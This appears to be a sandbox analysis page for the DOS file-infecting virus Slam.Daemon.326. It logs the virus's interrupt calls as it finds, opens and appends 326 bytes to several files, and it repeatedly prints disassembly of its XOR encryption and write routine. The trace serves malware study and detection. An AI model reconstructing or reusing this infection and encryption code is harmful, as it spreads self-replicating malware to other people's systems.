Sample viewer

vx.netlux.org/Virus.DOS.Slam.Daemon.326

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:53:48.208589469Z 53 PC: 12aa4 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:53:48.211152098Z 37 PC: 12ab4 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:53:48.213119749Z 71 PC: 12abd | Get current directory
2018-12-17T22:53:48.216211982Z 53 PC: 12ac4 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:53:48.218313842Z 37 PC: 12acd | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:53:48.219729218Z 78 PC: 12afe | Find first file
2018-12-17T22:53:48.228060589Z 67 PC: 12b07 | Get or set file attributes
2018-12-17T22:53:48.233797001Z 67 PC: 12b11 | Get or set file attributes
2018-12-17T22:53:48.24951809Z 61 PC: 12b15 | Open file (Filename = '')
2018-12-17T22:53:48.268021974Z 87 PC: 12b1a | Get or set file date and time
2018-12-17T22:53:48.269703091Z 63 PC: 12b25 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:53:48.277701741Z 66 PC: 12b34 | Move file pointer
2018-12-17T22:53:48.279345341Z 44 PC: 12a4e | Get time 0x12a4e: cmp dl, 0
0x12a51: je 0x12a4a
0x12a53: mov byte ptr [0x108], dl
0x12a57: call 0x12a6c
0x12a5a: pop bx
0x12a5b: mov cx, 0x146
0x12a5e: mov dx, 0x100
0x12a61: mov ah, 0x40
0x12a63: int3
0x12a64: inc byte ptr [0x246]
0x12a68: call 0x12a6c
0x12a6b: ret
0x12a6c: mov bx, 0x144
0x12a6f: mov al, byte ptr [0x108]
0x12a73: cmp al, 0
0x12a75: je 0x12a83
0x12a77: xor byte ptr [bx], al
0x12a7a: inc bx
0x12a7b: add al, bh
0x12a7d: cmp bx, 0x22a
2018-12-17T22:53:48.28184661Z 64 PC: 12a64 | Write file or device (Write 326 bytes on handle 5)
2018-12-17T22:53:48.286387418Z 87 PC: 12b3f | Get or set file date and time
2018-12-17T22:53:48.287983578Z 62 PC: 12b42 | Close file
2018-12-17T22:53:48.294918488Z 67 PC: 12b4d | Get or set file attributes
2018-12-17T22:53:48.304951864Z 79 PC: 12afe | Find next file
2018-12-17T22:53:48.307552639Z 67 PC: 12b07 | Get or set file attributes
2018-12-17T22:53:48.31382188Z 67 PC: 12b11 | Get or set file attributes
2018-12-17T22:53:48.324042928Z 61 PC: 12b15 | Open file (Filename = '')
2018-12-17T22:53:48.344564101Z 87 PC: 12b1a | Get or set file date and time
2018-12-17T22:53:48.345809295Z 63 PC: 12b25 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:53:48.352998071Z 66 PC: 12b34 | Move file pointer
2018-12-17T22:53:48.35436677Z 44 PC: 12a4e | Get time 0x12a4e: cmp dl, 0
0x12a51: je 0x12a4a
0x12a53: mov byte ptr [0x108], dl
0x12a57: call 0x12a6c
0x12a5a: pop bx
0x12a5b: mov cx, 0x146
0x12a5e: mov dx, 0x100
0x12a61: mov ah, 0x40
0x12a63: int3
0x12a64: inc byte ptr [0x246]
0x12a68: call 0x12a6c
0x12a6b: ret
0x12a6c: mov bx, 0x144
0x12a6f: mov al, byte ptr [0x108]
0x12a73: cmp al, 0
0x12a75: je 0x12a83
0x12a77: xor byte ptr [bx], al
0x12a7a: inc bx
0x12a7b: add al, bh
0x12a7d: cmp bx, 0x22a
2018-12-17T22:53:48.356647548Z 64 PC: 12a64 | Write file or device (Write 326 bytes on handle 5)
2018-12-17T22:53:48.36084948Z 87 PC: 12b3f | Get or set file date and time
2018-12-17T22:53:48.362216657Z 62 PC: 12b42 | Close file
2018-12-17T22:53:48.369635251Z 67 PC: 12b4d | Get or set file attributes
2018-12-17T22:53:48.379906879Z 79 PC: 12afe | Find next file
2018-12-17T22:53:48.383046295Z 67 PC: 12b07 | Get or set file attributes
2018-12-17T22:53:48.389499884Z 67 PC: 12b11 | Get or set file attributes
2018-12-17T22:53:48.399903581Z 61 PC: 12b15 | Open file (Filename = '')
2018-12-17T22:53:48.407598164Z 87 PC: 12b1a | Get or set file date and time
2018-12-17T22:53:48.409076909Z 63 PC: 12b25 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:53:48.415529159Z 66 PC: 12b34 | Move file pointer
2018-12-17T22:53:48.41836353Z 44 PC: 12a4e | Get time 0x12a4e: cmp dl, 0
0x12a51: je 0x12a4a
0x12a53: mov byte ptr [0x108], dl
0x12a57: call 0x12a6c
0x12a5a: pop bx
0x12a5b: mov cx, 0x146
0x12a5e: mov dx, 0x100
0x12a61: mov ah, 0x40
0x12a63: int3
0x12a64: inc byte ptr [0x246]
0x12a68: call 0x12a6c
0x12a6b: ret
0x12a6c: mov bx, 0x144
0x12a6f: mov al, byte ptr [0x108]
0x12a73: cmp al, 0
0x12a75: je 0x12a83
0x12a77: xor byte ptr [bx], al
0x12a7a: inc bx
0x12a7b: add al, bh
0x12a7d: cmp bx, 0x22a
2018-12-17T22:53:48.420696421Z 64 PC: 12a64 | Write file or device (Write 326 bytes on handle 5)
2018-12-17T22:53:48.423513562Z 87 PC: 12b3f | Get or set file date and time
2018-12-17T22:53:48.425915513Z 62 PC: 12b42 | Close file
2018-12-17T22:53:48.433191131Z 67 PC: 12b4d | Get or set file attributes
2018-12-17T22:53:48.443140334Z 59 PC: 12aea | Change current directory
2018-12-17T22:53:48.445703327Z 37 PC: 12af6 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')